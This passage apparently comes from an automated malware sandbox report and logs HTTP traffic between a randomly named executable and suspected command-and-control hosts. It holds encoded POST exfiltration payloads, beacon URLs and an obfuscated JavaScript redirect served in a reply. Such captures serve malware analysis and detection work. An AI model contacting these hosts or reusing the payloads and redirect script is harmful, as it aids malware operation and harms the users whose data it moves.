0b a0 0e 81 ed [TRUNCATED]
                  Data Ascii: 20fT_o@S$rtR;D5"t\IhXY[mh3j$gJ^[xJ)TQL&#YuC+mdiNV_v:e{<L$S|Ml]mio;hqYIPfooh4.*-f62+KmD%5qnu8|Du,vY%g08MsYc0TSGrc,M-+!i(E3HBVETDcQ3QMphL.i?VL{-k6xgm]9Cya/iMxS"6]9~C1D<8F*&p;@fi&wT=yT<+,E}CuCC*R0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.649732142.202.6.230805700C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 13:53:52.318998098 CEST1836OUTPOST /hqcp/ HTTP/1.1
                  Host: www.6171nvuhb.rent
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.6171nvuhb.rent
                  Referer: http://www.6171nvuhb.rent/hqcp/
                  Content-Length: 1246
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Data Raw: 53 74 75 78 37 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 55 6e 37 58 74 71 50 30 6d 73 72 31 74 63 76 63 74 42 30 37 79 43 54 34 47 66 74 61 44 38 4f 31 79 6a 4b 67 34 61 36 56 69 46 2b 62 77 41 2f 74 63 79 6c 46 77 66 4f 63 61 74 47 62 36 39 2f 6c 71 38 66 72 47 57 6a 6a 4d 68 37 43 79 61 56 50 66 6d 4e 4f 6d 48 4e 79 52 78 35 61 34 72 4a 6e 35 48 69 5a 69 78 50 6e 41 47 57 6b 4b 6f 72 67 45 73 65 61 2b 49 32 2b 51 68 4e 31 79 39 47 4c 31 57 59 39 54 4f 62 7a 30 31 41 76 6f 35 6a 66 34 36 36 2b 49 69 49 4c 65 6f 33 7a 54 4c 56 4a 52 70 2f 4e 72 48 47 56 65 61 6b 53 75 58 55 61 51 65 65 2f 43 77 34 47 65 6e 54 32 52 30 58 47 6a 69 79 70 6c 45 78 31 47 31 6c 4d 4d 66 34 4b 4f 64 4c 64 70 4b 6e 53 74 4a 55 6a 73 31 6f 63 37 34 32 55 57 62 37 2b 43 73 6a 6f 54 6c 43 5a 43 75 6d 32 59 5a 2b 6e 37 4e 48 78 76 76 73 61 41 48 46 58 76 61 4a 61 67 62 70 4c 59 46 4c 4d 73 6e 62 51 65 4a 51 70 55 59 38 74 62 51 77 47 30 67 34 68 68 39 47 6f 63 55 48 42 6c 2b 44 64 58 67 6f 2b 32 6e 6d 52 4c 70 58 70 6a 37 75 77 [TRUNCATED]
                  Data Ascii: Stux7=X5xwEotSV/RSUn7XtqP0msr1tcvctB07yCT4GftaD8O1yjKg4a6ViF+bwA/tcylFwfOcatGb69/lq8frGWjjMh7CyaVPfmNOmHNyRx5a4rJn5HiZixPnAGWkKorgEsea+I2+QhN1y9GL1WY9TObz01Avo5jf466+IiILeo3zTLVJRp/NrHGVeakSuXUaQee/Cw4GenT2R0XGjiyplEx1G1lMMf4KOdLdpKnStJUjs1oc742UWb7+CsjoTlCZCum2YZ+n7NHxvvsaAHFXvaJagbpLYFLMsnbQeJQpUY8tbQwG0g4hh9GocUHBl+DdXgo+2nmRLpXpj7uwK+pbqfoHaaUJidhAqiRly/w3bPdxavwKiNjSSSu2zHJvGP5NAQhD0HRdQjznmj2LIBopHPvB7DG6qbCJcAgynPFg9Ntuve3S/wJb3JBIlZnYTJln9KvG0ChQd1YpMGj6XRCpjzpt6wNljdm9Da0hFdegOVhyx+XZuV1JeH66sOT05+9kMpT4i6wAtOVCyubJvE72jTMOO5LOi+DUr4imghP7HNJiMQIebf4D4bGN6IirZ0lVX+vkEQ/pDHVbCBoO/z1qnPCeMtj2+c9yXR7Y1zNqfwaGlDIZSR31ZlJ0J2QQbATJ1lAwFnTtRfGe1ep7g2Z3jftjeHRw2xWJiR/gPXu+owDpGk2R92OoGwhlOTe2qFV/W2N4YQr1NkQaVGUoD/WvXN46YxxgQrWcwKqYDv8M4NjlfBIYjyvzDeVmHFSUm+vyhwf8fZr0RPAsaQ8So1/hfxayIFa6fD/2Dk7CEYK72O+msu3HphvQBTGPuTn7Mr9D01CkTxFxaQFRDrV+QLbOa8AOtK/xmJlRxPA6/o1i0fG/bYt07bz6cz4VjCf+V7B3MBr87jyFDXGcb3z6HfezjzG6io48StV0Tn8Lp91yfZ7fY6mij3n0SquSxglYbfoDXAOXqcDYlsw5/C86Izh6pZ07kpYR8x9XQWoKOcE1nYfvUpLvgA [TRUNCATED]
                  Jul 2, 2024 13:53:53.554630041 CEST744INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Tue, 02 Jul 2024 11:53:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Data Raw: 32 30 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 54 5f 6f da 40 0c 7f e7 53 dc ee 09 24 72 c9 e5 7f 0a 74 02 06 52 3b 44 35 95 f6 85 22 74 b9 5c 9a 00 49 68 ee 58 59 5b be fb 9c 85 6d 68 dd 33 6a 24 c7 67 9f ed 9f e3 d8 ee 4a 5e a6 5b 85 78 c2 4a 29 54 0f df cd c6 9a 8f 51 1a f5 f0 a4 bf 1c de 4c 26 a3 e1 0c 23 59 f2 1e d6 75 19 ad 89 43 c9 86 e9 2b a9 81 a0 6d cb 82 64 69 4e 56 12 5f 76 f5 3a d8 65 a3 7b 3c 4c fa 24 cd 53 d5 7c 4d a3 0b 6c 5d 0d e4 fd 6d 69 ee 6f fa c3 ab fb eb 3b dc e6 eb ff 68 0f ad f7 71 1a df 59 89 96 49 a6 50 af 66 6f 6f 68 be e8 34 9a f1 2e e7 2a 2d f2 66 0b bd 36 10 aa cc 92 0c 8c a2 82 ef 32 91 2b c2 4b c1 94 18 6d 44 25 35 71 9d 17 6e 75 c0 38 c9 08 7c 15 18 e3 44 a9 ad bc d0 75 d0 84 2c 8d 76 84 17 59 25 ac e4 67 df 30 38 8f 4d cf e6 16 73 02 8b 59 ae 63 09 97 f1 30 0e e1 c6 e3 b8 8a 54 c1 ca 53 d4 47 a1 8e 90 72 f0 63 c6 1e a7 2c 13 7f c1 e7 c6 a2 83 c0 4d 92 2d 2b 21 ad 69 11 09 a8 93 14 a5 1a 88 b8 28 45 33 c9 da 48 42 92 87 56 13 de 1f a9 1e 9e e7 f8 d4 0b a0 0e 81 ed [TRUNCATED]
                  Data Ascii: 20fT_o@S$rtR;D5"t\IhXY[mh3j$gJ^[xJ)TQL&#YuC+mdiNV_v:e{<L$S|Ml]mio;hqYIPfooh4.*-f62+KmD%5qnu8|Du,vY%g08MsYc0TSGrc,M-+!i(E3HBVETDcQ3QMphL.i?VL{-k6xgm]9Cya/iMxS"6]9~C1D<8F*&p;@fi&wT=yT<+,E}CuCC*R0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.649733142.202.6.230805700C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 13:53:54.891246080 CEST543OUTGET /hqcp/?Stux7=a7ZQHf8WLvhHVBver5nOwZih6r/S4XIGgVvybuFCKLHzqS2zk6yuhV2s1hLkbw5zmPfcdtbcw9raqNmLcm/5Ggyq9qBeDFk3p2MLA1pm9c8F5HyDpkyVADePZbSIOvXG2KyhUgY=&YF9Df=_VBD7fO8YfupmT HTTP/1.1
                  Host: www.6171nvuhb.rent
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Jul 2, 2024 13:53:56.117063046 CEST1236INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Tue, 02 Jul 2024 11:53:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Data Raw: 35 35 32 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 33 49 42 73 56 53 72 32 78 4f 41 43 49 56 4a 55 22 2c 63 6b 3a 22 33 49 42 73 56 53 72 32 78 4f 41 43 49 56 4a 55 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 38 30 30 63 63 66 32 37 34 63 33 61 35 39 33 61 33 36 35 33 65 36 61 63 62 66 62 30 30 63 37 63 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 [TRUNCATED]
                  Data Ascii: 552<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"3IBsVSr2xOACIVJU",ck:"3IBsVSr2xOACIVJU"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?7758179a36947d1ed305205311f9e27d"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?be472e87 [TRUNCATED]
                  Jul 2, 2024 13:53:56.117083073 CEST319INData Raw: 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c
                  Data Ascii: nt.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script> var url = "https://aaa.za1.bztqk.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; setTimeout(func


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.64973574.208.236.230805700C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 13:54:01.230233908 CEST814OUTPOST /9qp3/ HTTP/1.1
                  Host: www.motorsportgives.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.motorsportgives.com
                  Referer: http://www.motorsportgives.com/9qp3/
                  Content-Length: 210
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Data Raw: 53 74 75 78 37 3d 55 58 77 4f 37 51 47 48 4a 4d 4b 54 5a 5a 4d 41 78 34 66 34 53 44 72 53 56 7a 44 56 63 2b 4f 30 4b 6a 44 75 46 58 6e 73 79 2f 41 54 6e 7a 61 6c 49 73 67 5a 56 45 6b 56 7a 4b 68 58 36 33 4a 79 65 7a 51 79 73 43 78 69 4e 30 79 35 6e 6d 46 47 63 4e 35 66 61 76 59 38 5a 56 2f 38 64 32 31 78 6a 65 47 59 2f 61 30 4a 4b 75 41 59 46 31 54 4a 49 66 7a 72 32 51 67 75 44 46 70 6d 33 43 6a 7a 77 4b 75 39 50 64 35 76 45 6a 6d 46 50 63 73 2f 38 57 68 39 46 5a 53 7a 33 39 73 49 37 4f 51 77 69 58 73 46 32 51 59 4f 33 4b 4a 64 7a 6b 61 76 78 6c 66 6c 33 4c 6e 76 61 50 37 6c 36 44 55 77 77 66 4e 69 36 2b 58 42 7a 6d 7a 63
                  Data Ascii: Stux7=UXwO7QGHJMKTZZMAx4f4SDrSVzDVc+O0KjDuFXnsy/ATnzalIsgZVEkVzKhX63JyezQysCxiN0y5nmFGcN5favY8ZV/8d21xjeGY/a0JKuAYF1TJIfzr2QguDFpm3CjzwKu9Pd5vEjmFPcs/8Wh9FZSz39sI7OQwiXsF2QYO3KJdzkavxlfl3LnvaP7l6DUwwfNi6+XBzmzc
                  Jul 2, 2024 13:54:01.751252890 CEST580INHTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Date: Tue, 02 Jul 2024 11:54:01 GMT
                  Server: Apache
                  Content-Encoding: gzip
                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.64973674.208.236.230805700C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 13:54:03.924988985 CEST838OUTPOST /9qp3/ HTTP/1.1
                  Host: www.motorsportgives.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.motorsportgives.com
                  Referer: http://www.motorsportgives.com/9qp3/
                  Content-Length: 234
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Data Raw: 53 74 75 78 37 3d 55 58 77 4f 37 51 47 48 4a 4d 4b 54 59 35 63 41 39 35 66 34 56 6a 72 52 4a 44 44 56 53 65 4f 77 4b 6a 2f 75 46 57 79 78 79 4e 55 54 6e 57 2b 6c 4a 74 67 5a 59 6b 6b 56 6e 61 67 64 6c 6e 4a 70 65 7a 4d 51 73 41 6c 69 4e 77 53 35 6e 6b 4e 47 62 36 74 65 63 2f 59 79 53 31 2f 2b 44 47 31 78 6a 65 47 59 2f 61 77 6e 4b 74 77 59 46 46 6a 4a 4a 39 62 6f 6f 41 67 74 41 46 70 6d 7a 43 6a 33 77 4b 75 4c 50 59 59 36 45 67 4f 46 50 59 6f 2f 38 48 68 2b 4c 5a 53 31 7a 39 74 6c 36 65 52 70 73 45 64 49 2b 7a 45 4d 68 74 31 6d 32 53 62 31 74 57 66 47 6c 62 48 74 61 4e 6a 58 36 6a 55 61 79 66 31 69 6f 70 62 6d 38 53 57 2f 4c 46 2f 35 62 58 49 4b 48 64 61 71 76 67 42 32 6d 55 66 39 69 77 3d 3d
                  Data Ascii: Stux7=UXwO7QGHJMKTY5cA95f4VjrRJDDVSeOwKj/uFWyxyNUTnW+lJtgZYkkVnagdlnJpezMQsAliNwS5nkNGb6tec/YyS1/+DG1xjeGY/awnKtwYFFjJJ9booAgtAFpmzCj3wKuLPYY6EgOFPYo/8Hh+LZS1z9tl6eRpsEdI+zEMht1m2Sb1tWfGlbHtaNjX6jUayf1iopbm8SW/LF/5bXIKHdaqvgB2mUf9iw==
                  Jul 2, 2024 13:54:04.429312944 CEST580INHTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Date: Tue, 02 Jul 2024 11:54:04 GMT
                  Server: Apache
                  Content-Encoding: gzip
                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                  Session IDSource IPSource PortDestination IPDestination Port
                  7192.168.2.64973774.208.236.23080
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 13:54:06.911597967 CEST1851OUTPOST /9qp3/ HTTP/1.1
                  Host: www.motorsportgives.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.motorsportgives.com
                  Referer: http://www.motorsportgives.com/9qp3/
                  Content-Length: 1246
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Data Raw: 53 74 75 78 37 3d 55 58 77 4f 37 51 47 48 4a 4d 4b 54 59 35 63 41 39 35 66 34 56 6a 72 52 4a 44 44 56 53 65 4f 77 4b 6a 2f 75 46 57 79 78 79 4e 4d 54 6e 67 79 6c 49 4f 49 5a 5a 6b 6b 56 34 71 67 63 6c 6e 4a 6f 65 7a 45 55 73 41 6f 66 4e 32 65 35 6d 42 42 47 65 49 56 65 56 2f 59 79 64 56 2f 2f 64 32 31 6b 6a 65 57 63 2f 5a 59 6e 4b 74 77 59 46 44 48 4a 41 50 7a 6f 76 77 67 75 44 46 70 55 33 43 6a 54 77 4b 32 62 50 59 56 42 46 51 75 46 50 34 34 2f 2f 78 56 2b 55 4a 53 33 2b 64 74 39 36 65 64 4d 73 45 42 2b 2b 77 5a 70 68 71 64 6d 30 45 79 77 34 33 66 53 2b 49 65 4d 50 74 37 65 6a 33 49 36 32 4e 68 44 6b 4b 54 67 2b 51 4b 38 4a 41 7a 2b 59 6d 70 32 45 4f 47 51 76 6e 4e 67 6b 67 44 74 32 53 4f 63 6a 41 64 77 31 6a 32 63 4d 4f 56 4b 44 6a 4e 6b 5a 42 62 73 66 61 70 37 6c 49 58 4e 64 48 44 33 5a 52 34 30 64 67 55 4f 75 78 31 6c 65 30 6f 7a 64 51 2f 2f 44 42 56 46 75 5a 62 50 48 67 74 4f 41 72 70 44 47 78 33 7a 55 33 68 36 58 2f 4a 57 70 53 62 54 67 44 53 77 65 62 79 65 4c 70 38 72 6e 6b 45 55 2b 7a 73 75 [TRUNCATED]
                  Data Ascii: Stux7=UXwO7QGHJMKTY5cA95f4VjrRJDDVSeOwKj/uFWyxyNMTngylIOIZZkkV4qgclnJoezEUsAofN2e5mBBGeIVeV/YydV//d21kjeWc/ZYnKtwYFDHJAPzovwguDFpU3CjTwK2bPYVBFQuFP44//xV+UJS3+dt96edMsEB++wZphqdm0Eyw43fS+IeMPt7ej3I62NhDkKTg+QK8JAz+Ymp2EOGQvnNgkgDt2SOcjAdw1j2cMOVKDjNkZBbsfap7lIXNdHD3ZR40dgUOux1le0ozdQ//DBVFuZbPHgtOArpDGx3zU3h6X/JWpSbTgDSwebyeLp8rnkEU+zsuNcOGjbbDzat/W/4lsYhNFdszS0awXDeRUsfjm1lR/7Mgt3mYY62nZOEAk/0cS3fRoi5QJW5tyNuWKgBP3+3pXMxozH5Zp9ynpyduvfnlrCpodPVX+L4pkHpwzIFIbyhzuLmVZVQPMnqDoJ2/lLXdgIkKshrPrGn74ALK3PusxyS7EeV6i6tkI4QKPDPRpyUe7wVWggRdTLc4OaV7z/N/53HIymBTrHyIs+buAUAaMn8t+MQJgnwHLfpsKg3lSvF4VpDY7VxjtKubysHoUQjxephkolhcZx5+Ri1GxD4CdvOsudkIV7ebF29H2S68f08LDYjNxdx1yH9tIiaURvkmK421+Vt1x8AL/Phs4P8xDuSIIHssQ/Zi7P+/UOAW3OPKFIrHqyQgzDJgvRY1J4ckUwwwYTDTF0vlq/DY4RMTzIBnmXSGrHB6lK3IItyBd141Wj+LacPh8KBSlyT9J8ARrTjaR1gRSrONSCqeQSnJN2fzqA7ex2t8XIPs0gFK4TIN14oNj+D0bmQp55R2pK6VUPclNvvBdP+rzElPIrNoahEphNEsGRVLty+grf9jyENSPSP/Q2flYg6irovfkP0YoZOriXXGQT6FUTl9fVpP1HWNip+2Q5vE5Q0TS7UgbZv3ZBG+KhnjkxvvepaGKRQwjeI7BbvEPzyF90 [TRUNCATED]
                  Jul 2, 2024 13:54:07.978430986 CEST580INHTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Date: Tue, 02 Jul 2024 11:54:07 GMT
                  Server: Apache
                  Content-Encoding: gzip
                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
                  Jul 2, 2024 13:54:07.979111910 CEST580INHTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Date: Tue, 02 Jul 2024 11:54:07 GMT
                  Server: Apache
                  Content-Encoding: gzip
                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 